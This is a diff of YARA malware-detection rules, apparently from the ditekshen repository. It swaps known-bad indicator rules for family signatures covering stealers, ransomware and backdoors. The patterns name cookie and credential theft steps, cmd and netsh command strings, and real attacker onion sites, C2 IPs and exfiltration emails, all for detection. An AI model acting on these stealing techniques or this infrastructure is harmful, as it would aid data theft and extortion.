-		$pk7 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAt9uYkHzaizNXg/S11ncTTLybkMtqrKW8gg6TyzbGWnRNROl9O+l1VZBLG0xiMt1mZbuStl8Lt3l1vlkMa92kgLjN+UfKmq3KhBEheN2uMmR0WpwV83kceVRmzr5lug4RyQ/xA6/OXK4NptDIT4L6CUTBWMyk2mmY0Cq9HyyrjdnHeAXWAcQGFEac7W4jTjONZqI+lgScPewS+cPFnz1hAD0IAqzj5X2mZVSfFGR3tDoIe42jw5wb6W2yi8zb3mgKrGtTBbw0Ppj0UgKrmdN5iFmfUQHLEzKAakDggLcBtrW1o5+4WMaZOLw8maU5byvjXu3F3i3GdQe8SKTYcVK5OQIDAQAB" ascii wide
-		$pk8 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAugqZ4ATE9+9FqununW/DBvGosnUX/bNxQzMYUmE14GJIbNa6vwYSNXOlG09mvdAqZqD3lXihWDjy25+gzqSeS+Fs2qNyTdfGPA8iu2xx5RRUXKLGFThxtIzg3fohAK3+LxJVhxtuITAT38IHacc7dVLHsrddu4UDjiHGFdvXjB55Nwe5cu1BYylHsARMYycBA2FwLP57cKvc2/C3OXBAF6qbsVXBcyFhrKOOYA/+5IjFfEhgHy2FLHRf8lmPQPbSlrM6dk+W4D5KVqOPx/eFp0geUJJlmlre3flI29qWS20bkGqAEz9j07y69HGYN9Nt7+DRgBwrpNo/EkZkuaSTtQIDAQAB" ascii wide
-		$pk9 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuuAQlnowSGaSi2XgnwaHQAFZ6e7C0SwpAyyLTncJ4l5cwFbM+mwnV+iV3a+ert8WqOmW1aKOCjTPXrXNoirQgboVpLfhIIT1uOOss4O8lodRxgB6QrLCI7PYMZ+8VgIdEPPzsjmTFLxFc7DERxnSjhGdRQIjZNjm7bGScJD0MayDL9KTkVdJtC+C9n5dwEwg6XtQbwLDeaGZaByOgB/zR6tlcPQCNU9rj1qfcVrI/dFW4br/NnJbqrH714z+dvCa18IJTcu3kW74CAilvHrl5qFDd8CCQhjLrjQDPxAoCba9aXKr6dwt34/MU0tVRTYjzMAxR4yTh3oEjVT+HifvVwIDAQAB" ascii wide
-		$pk10 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwcPjnPl8bI1A0iudX70FKkTjnLjHyetHN2kAIcyOG10K8vm67n/Ma9mAnoDggD3D6UtAbwjvHwPW1m9WF+MrnBXmBizE0JpwOLtVFcHeVLJXlYn/C5RNZziTCwjauH6TlT7Mo/oHfg7nX4IXEuaeAZz8g9ioeJ1Lydi9ZZM1gmdNk8KuKR0zrrJ6MMAGrhMtblLFVwtMn7IlNjT/BgSL4pDyNa++wI5P4R2rMykJwGu/7o2kKE2IFimtFDyZ5a+CX46cdKt7uo5eKFiqf/jTes9/y5AgoS69mt4fRvWFhP7qHXRO2gG8XAc+9suhiuVUWZTAu3xXz5VsmBtk8pzcpwIDAQAB" ascii wide
-		$pk11 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwMQXFMtYf60KrbUVwNVoPhhrCTNMY3Zv+/WULZRZfJ4dMhYozDxtRVdtBDKtuYuHCGLu/Ymf9wKFFXgVH3En7qI1sU2UdjNR4086X8oSTMUn/GwEAEIZAHtSFuk6AXcXW+eO0yxPF+lt5AZcNnJocWBVZ8RWGvsQdtGgtZalttAynROC4RUGkvD1h1ssMteHWneFLpfzSPGlbu0s0cemsrTPmhexGIenup/YjNdmhbfvvYE9kZfPebGtZHw6oQXWcG7sAlvkGciJl3Eo9FznNj0K+v8WQW5L/UbosZaYVJbxlbtySvqUqZbkLKsmp91tr9bvTiDMZuXZS7iHVqchUQIDAQAB" ascii wide
-		$pk12 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxbKVxwYe4PpnPm0XtuqShDqFWCFRBw0tYo2vmLwVPlwa+0+ox8+nF0mzWC3ZZT2XkGSodszosOoocfKAwOjQnA+4/Hokl4hgG6K8O7wWuWlvgo4fkcZShy2cMY9FaC6e4bMfurlDFt7OVrKKWAyEGv49Etq6LNoyl5ddM/XmspG52gscRoIcOTwBL4bD8nVcamZXqE4j2mS62HicQ6q9YgRVs1PLbgVPbg8c2rFzpN1e8wZdPtvyGON0m3CmxsYa63yianbnBAS4WnxEnoI7eCZZNkblr+kZB4J9War5VYHu9lFw4XWeuHget/Rn8oGCJOMHkZMz23NpUVaX9htQAwIDAQAB" ascii wide
-		$url1 = "://zujgzbu5y64xbmvc42addp4lxkoosb4tslf5mehnh7pvqjpwxn5gokyd.onion" ascii wide
-		$url2 = "://alphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad.onion" ascii wide
-		$url3 = "://2cuqgeerjdba2rhdiviezodpu3lc4qz2sjf4qin6f7std2evleqlzjid.onion" ascii wide
-		$url4 = "://aoczppoxmfqqthtwlwi4fmzlrv6aor3isn6ffaiic55wrfumxslx3vyd.onion" ascii wide
-		$url5 = "://b4twqa2mvob3s6uvuyfra5xk3qgps2v5kkt7k2qnb7rpdu3j4fkntead.onion" ascii wide
-		$url6 = "://b6v4ojs7jfvftvcoagjxp7qz33yeljydqy6afzsh26vqbzcjwz4b3zad.onion" ascii wide
-		$url7 = "://htnpafzbvddr2llstwbjouupddflqm7y7cr7tcchbeo6rmxpqoxcbqqd.onion" ascii wide
-		$url8 = "://id7seexjn4bojn5rvo4lwcjgufjz7gkisaidckaux3uvjc7l7xrsiqad.onion" ascii wide
-		$url9 = "://mu75ltv3lxd24dbyu6gtvmnwybecigs5auki7fces437xvvflzva2nqd.onion" ascii wide
-		$url10 = "://odf3dt34tkqndw5h2l5gt2gwwd3jct5rwwjusbd3vlin2jueyv2qkgid.onion" ascii wide
-		$url11 = "://rfosusl6qdm4zhoqbqnjxaloprld2qz35u77h4aap46rhwkouejsooqd.onion" ascii wide
-		$url12 = "://sty5r4hhb5oihbq2mwevrofdiqbgesi66rvxr5sr573xgvtuvr4cs5yd.onion" ascii wide
-		$url13 = "://xqoykemmcivwtpxh3a6pu3w7sstr2y7hapxdiv4caaxidurmwwbjx2id.onion" ascii wide
-		$url14 = "://y4722ss64vel5hmph75te7lx2x5xz463322ypjirm5ytxviijtdpybid.onion" ascii wide
+		$x1 = "Vulturi_" ascii wide
+		$x2 = "VulturiProject" fullword ascii
+		$s1 = { 5b 00 2d 00 5d 00 20 00 53 00 65 00 72 00 76 00
+               65 00 72 00 20 00 ?? ?? 20 00 69 00 73 00 20 00
+               6f 00 66 00 66 00 6c 00 69 00 6e 00 65 00 2e 00
+               2e 00 2e 00 00 ?? 5b 00 2b 00 5d 00 20 00 53 00
+               65 00 72 00 76 00 65 00 72 00 20 00 00 ?? ?? 00
+               69 00 73 00 20 00 6f 00 6e 00 6c 00 69 00 6e 00
+               65 00 }
+		$s2 = "Writing is not alowed" wide
+		$s3 = "System\\ProcessList.txt" fullword wide
+		$s4 = "[X] GetSSL ::" fullword wide
+		$s5 = "Failed to steal " wide
+		$s6 = "StealerStub" fullword ascii
+		$s7 = "/C chcp 65001 && netsh" wide
+		$n1 = "fetch_options" fullword wide
+		$n2 = "send_report" fullword wide
+		$n3 = "?username=" fullword wide
 
 	condition:
-		(1 of ( $pk* ) and 1 of ( $url* ) )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and any of them ) or all of ( $n* ) or 5 of ( $s* ) or ( 1 of ( $n* ) and 3 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Koxic
+rule DITEKSHEN_MALWARE_Win_Tofsee : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with LokiLocker ransomware"
-		author = "ditekShen"
-		id = "4c4ff722-cac1-5967-9e79-681f47566e96"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects Tofsee"
+		author = "ditekSHen"
+		id = "86371c0b-72f9-56c0-9f34-f14d2a069c91"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L571-L580"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8933-L8949"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ca4d0e85cf4c7a134609262e21d5cef98100ba0a046d17ffe51bf3975dc7cae9"
+		logic_hash = "9ef06643173c70c5b06b19200cb5b5efa7db7eb3516b67621f0b1975f1c80781"
 		score = 75
-		quality = 73
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "wilhelmkox@tutanota.com" ascii wide nocase
-		$s2 = "F3C777D22A0686055A3558917315676D607026B680DA5C8D3D4D887017A2A844F546AE59F59F" ascii wide
+		$s1 = "n%systemroot%\\system32\\cmd.exe" fullword wide
+		$s2 = "loader_id" fullword ascii
+		$s3 = "start_srv" fullword ascii
+		$s4 = "lid_file_upd" fullword ascii
+		$s5 = "localcfg" fullword ascii
+		$s6 = "Incorrect respons" fullword ascii
+		$s7 = "mx connect error" fullword ascii
+		$s8 = "Error sending command (sent = %d/%d)" fullword ascii
+		$s9 = "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u" fullword ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Ryuk
+rule DITEKSHEN_MALWARE_Win_Khonsari : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Ryuk ransomware"
-		author = "ditekShen"
-		id = "00cf99da-ff3c-5c91-8966-69a8afc8613a"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects Khonsari ransomware"
+		author = "ditekSHen"
+		id = "2d562e62-a948-570d-8ff2-cc4835b91573"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L582-L592"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8951-L8963"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a2b6106fc49dd254ca936e285fa0c2a3aee7110832686638d20d369d77f6c48f"
+		logic_hash = "2a78f36259481fccb31b2e6248fed19699b6eb05bacfd08905414764c3045943"
 		score = 75
-		quality = 71
-		tags = ""
+		quality = 73
+		tags = "FILE"
 
 	strings:
-		$s1 = "WayneEvenson@protonmail.com" ascii wide nocase
-		$s2 = "WayneEvenson@tutanota.com" ascii wide nocase
-		$s3 = "14hVKm7Ft2rxDBFTNkkRC3kGstMGp2A4hk" ascii wide
+		$x1 = ".khonsari" fullword wide nocase
+		$s1 = "Encrypt" fullword ascii
+		$s2 = "CreateEncryptor" fullword ascii
+		$s3 = "GenerateKey" fullword ascii
+		$s4 = "277e5e6a-4da6-4138-97fa-3fecbdad0176" ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( all of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Lockdown
+
+rule DITEKSHEN_MALWARE_Win_Quantum : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with LockDown / cantopen ransomware"
-		author = "ditekShen"
-		id = "603f0113-d77b-590c-b2a0-804c6d1fbfbc"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects Quantum locker / ransomware"
+		author = "ditekSHen"
+		id = "76a9240e-5b4f-5a1e-9841-e5ba855fb06f"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L594-L603"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8965-L8987"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cb17bb92d6e8189a08508481b75d301a1227906815c684753859914d77d7b3e7"
+		logic_hash = "f35422d1f52f1f9f55a5e38c782d2cf621cd84da028358ab250584334d41249c"
 		score = 75
-		quality = 73
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "CCWhite@onionmail.org" ascii wide nocase
-		$s2 = "bc1q6ug0vrxz66d564qznclu9yyyvn6zurskezmt64" ascii wide
+		$x1 = "\\t<title>Quantum</title>" ascii wide
+		$x2 = "Quantum Locker.<br><br>" ascii wide
+		$s1 = "ERROR" fullword wide
+		$s2 = ".log" fullword wide
+		$s3 = "SLOW" fullword wide
+		$s4 = "Create" fullword wide
+		$s5 = "Integrity" fullword wide
+		$s6 = "Disabled" fullword wide
+		$s7 = "Deny" fullword wide
+		$s8 = "FAST" fullword wide
+		$s9 = "Mandatory" fullword wide
+		$s10 = "plugin.dll" fullword ascii
+		$s11 = "NetGetDCName" fullword ascii
+		$s12 = "NetShareEnum" fullword ascii
+		$s13 = "NetGetJoinInformation" fullword ascii
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 9 of ( $s* ) or ( pe.number_of_exports == 2 and pe.exports ( "RunW" ) and pe.exports ( "runW" ) and 5 of ( $s* ) ) ) ) or all of ( $x* )
 }
-rule DITEKSHEN_INDICATOR_KB_LNK_BOI_MAC : FILE
+rule DITEKSHEN_MALWARE_Win_Owowa : FILE
 {
 	meta:
-		description = "Detects Windows Shortcut .lnk files with previously known bad Birth Object ID and MAC address combination"
+		description = "Detects Owowa"
 		author = "ditekSHen"
-		id = "bfef07dc-a368-5119-82dd-de2096b17dd1"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		id = "c0a61601-e810-5acc-91a3-fa70db6d94da"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L605-L637"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8989-L9007"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "31a7966a0ea0fca363d2b926b06c8acbdae0c24dd2156389196255dbbf4ed662"
+		logic_hash = "afdeb30845ed4ef7b79e733e05d3e1ee53a8c441db74519577893d75c1249a41"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$boi1 = { 2C ED AC EC 94 7A E8 11 9F DE 00 0C 29 A1 A9 40 }
-		$boi2 = { 3F 54 89 18 46 CB E8 11 BD 0E 08 00 27 6D D5 D9 }
-		$boi3 = { DE 63 02 FE 57 A2 E8 11 92 E8 5C F3 70 8B 16 F2 }
-		$boi4 = { C2 CC 13 98 18 B9 E2 41 82 40 54 A8 AD E2 0A 9A }
-		$boi5 = { C4 9D 3A D4 C2 29 3D 47 A9 20 EE A4 D8 A7 D8 7D }
-		$boi6 = { E4 51 EC 20 66 61 EA 11 85 CD B2 FC 36 31 EE 21 }
-		$boi7 = { 6E DD CE 86 0F 07 90 4B AF 18 38 2F 97 FB 53 62 }
-		$boi8 = { 25 41 87 AE F1 D2 EA 11 93 97 00 50 56 C0 00 08 }
-		$boi9 = { C4 9D 3A D4 C2 29 3D 47 A9 20 EE A4 D8 A7 D8 7D }
-		$boi10 = { 5C 46 EC 05 A6 60 EB 11 85 EB 8C 16 45 31 19 7F }
-		$boi11 = { 30 8B 17 86 9B 35 C5 40 A7 9D 48 5C D6 3D F3 5C }
-		$boi12 = { E5 21 1D 04 9D A4 E9 11 A9 37 00 0C 29 0F 29 89 }
-		$boi13 = { 34 5F AC 8A 4E CE ED 4D 8E 55 83 8E EA 24 B3 4E }
-		$boi14 = { 49 77 25 3B D6 E1 EB 11 9C BB 00 D8 61 85 FD 9F }
-		$mac1 = { 00 0C 29 A1 A9 40 }
-		$mac2 = { 08 00 27 6D D5 D9 }
-		$mac3 = { 5C F3 70 8B 16 F2 }
-		$mac4 = { 00 0C 29 5A 39 04 }
-		$mac5 = { B2 FC 36 31 EE 21 }
-		$mac6 = { 00 50 56 C0 00 08 }
-		$mac7 = { 8C 16 45 31 19 7F }
-		$mac8 = { 00 0C 29 0F 29 89 }
-		$mac9 = { 00 D8 61 85 FD 9F }
+		$u1 = "jFuLIXpzRdateYHoVwMlfc" fullword ascii wide
+		$u2 = "Fb8v91c6tHiKsWzrulCeqO" fullword ascii wide
+		$u3 = "dEUM3jZXaDiob8BrqSy2PQO1" fullword ascii wide
+		$s1 = "powershell.exe" fullword wide
+		$s2 = "<RSAKeyValue><Modulus>" wide
+		$s3 = "HealthMailbox" fullword wide
+		$s4 = "6801b573-4cdb-4307-8d4a-3d1e2842f09f" ascii
+		$s5 = "<PreSend_RequestContent>b__" ascii
+		$s6 = "ClearHeaders" fullword ascii
+		$s7 = "get_UserHostAddress" fullword ascii
+		$s8 = "ExtenderControlDesigner" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and filesize < 3KB and ( 1 of ( $boi* ) and 1 of ( $mac* ) )
+		uint16( 0 ) == 0x5a4d and ( all of ( $u* ) or ( 2 of ( $u* ) and 3 of ( $s* ) ) or 6 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Powershellwifistealer
+rule DITEKSHEN_MALWARE_Win_Chebka : FILE
 {
 	meta:
-		description = "Detects email accounts used for exfiltration observed in PowerShellWiFiStealer"
-		author = "ditekShen"
-		id = "fa19e422-c682-5464-b034-330942daf3bd"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects Chebka"
+		author = "ditekSHen"
+		id = "df486522-695c-56f5-b93a-6f16829a3a3e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L691-L704"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9009-L9030"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f119b54032e2a6ca35819e811e6479b00936115d98ef6e928f4c819d04a8321f"
+		logic_hash = "cc8123a5d20fac51d4dfc225e743539456efb4d649060d078c3ed93e7724da01"
 		score = 75
-		quality = 63
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "hajdebebreidekreide@gmail.com" ascii wide nocase
-		$s2 = "usb@pterobot.net" ascii wide nocase
-		$s3 = "umairdadaber@gmail.com" ascii wide nocase
-		$s4 = "mrumairok@gmail.com" ascii wide nocase
-		$s5 = "credsenderbot@gmail.com" ascii wide nocase
-		$s6 = "easywareytb@gmail.com" ascii wide nocase
+		$s1 = "-k netsvcs" wide
+		$s2 = "%ssvchost.exe -k SystemNetworkService" wide
+		$s3 = "Mozilla/4.0 (compatible)" wide
+		$s4 = "_kasssperskdy" wide
+		$s5 = "winssyslog" wide
+		$s6 = "LoaderDll%d" wide
+		$s7 = "cmd.exe /c rundll32.exe shell32.dll," wide
+		$s8 = /cmd.exe \/c start (chrome|msedge|firefox|iexplorer)\.exe/ wide
+		$f1 = ".?AVCHVncManager@@" fullword ascii
+		$f2 = ".?AVCNetstatManager@@" fullword ascii
+		$f3 = ".?AVCTcpAgentListener@@" fullword ascii
+		$f4 = ".?AVIUdpClientListener@@" fullword ascii
+		$f5 = ".?AVCShellManager@@" fullword ascii
+		$f6 = ".?AVCScreenSpy@@" fullword ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or all of ( $f* ) or ( 3 of ( $f* ) and 3 of ( $s* ) ) or ( #s8 > 2 and 5 of them ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Powershellcookiestealer
+rule DITEKSHEN_MALWARE_Win_Flagpro : FILE
 {
 	meta:
-		description = "Detects email accounts used for exfiltration observed in PowerShellCookieStealer"
-		author = "ditekShen"
-		id = "c2bbb9a8-3e4c-5676-9676-2708a196ef8d"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects Flagpro"
+		author = "ditekSHen"
+		id = "da1bf899-feb5-5ed0-956e-c20bc3565a6e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L706-L715"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9032-L9049"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bd404e94939acb92dd56a7d2a1f7536bcb3f520ca1e9dc614b53828afbc6dac8"
+		logic_hash = "c5e5944426b7be690ad62dd0d98a8fc6f8135cab0dbdd8a5aaf1670491eda59d"
 		score = 75
-		quality = 71
-		tags = ""
+		quality = 50
+		tags = "FILE"
 
 	strings:
-		$s1 = "senmn0w@gmail.com" ascii wide nocase
-		$s2 = "mohamed.trabelsi.ena2@gmail.com" ascii wide nocase
+		$s1 = "download...." fullword ascii
+		$s2 = "~MYTEMP" fullword wide
+		$s3 = ".?AVCV20_LoaderApp@@" fullword ascii
+		$s4 = ".?AVCV20_LoaderDlg@@" fullword ascii
+		$s5 = "ExecYes" fullword ascii
+		$s6 = /<BODY ID=CV\d+_LoaderDlg BGCOLOR=/ ascii
+		$n1 = "://139.162.87.180" wide
+		$n2 = "://172.104.109.217" wide
+		$n3 = "://org.misecure.com/index.html" wide
+		$b1 = /(get all|click|close|maybe|get_outerHTML|download\d) (finished|pass|ok|windows|failed)!/ fullword ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and 4 of ( $s* ) or ( 1 of ( $n* ) and ( 2 of ( $s* ) or 1 of ( $b* ) ) ) or ( 2 of ( $s* ) and 1 of ( $b* ) )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Zebrocy : FILE
+rule DITEKSHEN_MALWARE_Win_Nplusminer
 {
 	meta:
-		description = "Detects Golang Build IDs in known bad samples"
+		description = "Detects PowerShell based NPlusMiner"
 		author = "ditekSHen"
-		id = "fc805e9d-47a0-5fcb-9b21-4806c13ab7b4"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		id = "a16b504f-e69a-5abb-8e37-01bf7c2df6ef"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1541-L1550"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9051-L9064"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "16b88460896012b42ca576995f5de98a7a9d2fcc53f8e148427bca31a883d19b"
+		logic_hash = "f6b81c2276765455d46e20ed81e19caa3ae36a31827568486a09bc1619ec478c"
 		score = 75
 		quality = 75
-		tags = "FILE"
+		tags = ""
+		snort_sid = "920284"
 
 	strings:
-		$s1 = "Go build ID: \"l6RAKXh3Wg1yzn63nita/b2_Y0DGY05NFWuZ_4gUT/H91sCRktnyyYVzECfvvA/l8f-yII0L_miSjIe-VQu\"" ascii
-		$s2 = "Go build ID: \"fiGGvLVFcvIhuJsSaail/jLt9TEPQiusg7IpRkp4H/hlcoXZIfsl1D4521LqEL/yL8dN86mCNc39WqQTgGn\"" ascii
+		$s1 = "$Core | Add-Member @{IsReadOnly = $((Get-ItemProperty -Path \".\\Includes\\Core.ps1\").IsReadOnly)} -Force" fullword ascii
+		$s2 = "$Core | Add-Member @{MinerCustomConfig = $((Get-Content \".\\Config\\MinerCustomConfig.json\" -Raw))} -Force" fullword ascii
+		$s3 = "If ($Variables.CheatGuy -and $Core.corehash -in $Hashes -and $Core.ScriptStartDate -le (Get-Date)" ascii
+		$s4 = "Try{(Get-ItemProperty -Path \".\\Includes\\Core.ps1\").IsReadOnly = $false} catch {}" fullword ascii
+		$s5 = " NPlusMiner/" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 1 of them
+		3 of them
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Gostealer : FILE
+rule DITEKSHEN_MALWARE_Win_PWSH_Poshcookiestealer
 {
 	meta:
-		description = "Detects Golang Build IDs in known bad samples"
+		description = "Detects PowerShell PoshCookieStealer"
 		author = "ditekSHen"
-		id = "25c0eb8b-c69c-5f50-b622-daaa3c8c62a4"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		id = "7326a056-288b-534b-811d-172bd6936d7b"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1552-L1562"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9066-L9080"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d548bc2580c8e8233a5fcdf85b947547c10f2c4d0056d14e990f30dd7b9a0672"
+		logic_hash = "234958098d09732675dd539e8d25c6754ba50bf92b3a19e7fef8c68d70503ec4"
 		score = 75
 		quality = 75
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s1 = "Go build ID: \"xQV-b1Fr7d576TTTpbXi/gq4FgVQqMcg--9tmY13y/76rKNEUBENlDFDcecmm_/mbw17A_6WrROaNCYDEQF\"" ascii
-		$s2 = "Go build ID: \"x4VqrSSsx8iysxVdfB-z/gIF3p7SUxiZsVgTuq7bN/93XHuILGnGYq2L83fRpj/eoY6nTqwk1sdMHTaXzlw\"" ascii
-		$s3 = "Go build ID: \"BPRThIYWbHcZQQ4K1y2t/2mO0-FjLC50P0QZuMTgC/9i6TYw_akiEF9ZPN0s3p/s1XoqXr7EyXMDVw5TTP3\"" ascii
+		$s1 = "\\User Data\\default\\Network\\Cookies" ascii nocase
+		$s2 = "Send-ToEmail" ascii
+		$s3 = "[Security.Cryptography.ProtectedData]::Unprotect($" ascii
+		$s4 = "$($env:LOCALAPPDATA)\\" ascii
+		$s5 = "$($env:HOMEPATH)\\" ascii
+		$s6 = "|ForEach-Object ToString X2) -join ''" ascii
+		$s7 = ".Attachments.Add($" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 1 of them
+		5 of them
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Goldenaxe : FILE
+rule DITEKSHEN_MALWARE_Win_Garrantdecrypt : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in known bad samples"
+		description = "Detects GarrantDecrypt ransomware"
 		author = "ditekSHen"
-		id = "e734d5b4-2332-5b46-a05e-fb35134ea070"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		id = "e3be3663-9978-5b8e-b6b2-0f44f269adb2"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1564-L1573"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9082-L9096"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4ab9aeaa74530de4a62ddfa8d7e8607e455d0ba4330260037327bec6d8d7abab"
+		logic_hash = "84b139e51f0ef0389c641d62409d702b0ae7ec6ecd2fa54baf2cf0c0078a8f5a"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "Go build ID: \"BrJuyMRdiZ7pC9Cah0is/rbDB__hXWimivbSGiCLi/B35SPLQwHal3ccR2gXNx/hEmVzhJWWatsrKwnENh_\"" ascii
-		$s2 = "Go build ID: \"5bgieaBe9PcZCZf23WFp/bCZ0AUHYlqQmX8GJASV6/fGxRLMDDYrTm1jcLMt8j/Wof3n5634bwiwLHFKHTn\"" ascii
+		$x1 = "%appdata%\\_uninstalling_.png" fullword wide
+		$x2 = "C:\\Windows\\sysnative\\vssadmin.exe" fullword wide
+		$x3 = /(ICQ|Skype) (@nuncatarde|@supersuso|@Whitehorsedecryption|@likeahorse|@Konwarszawski|@zipzipulya|Whitehorsedecryption|LIKEAHORSE DECRYPTION|Zip Zipulya)/ ascii
+		$s1 = "your unique ID" ascii
+		$s2 = "Google market ICQ" ascii
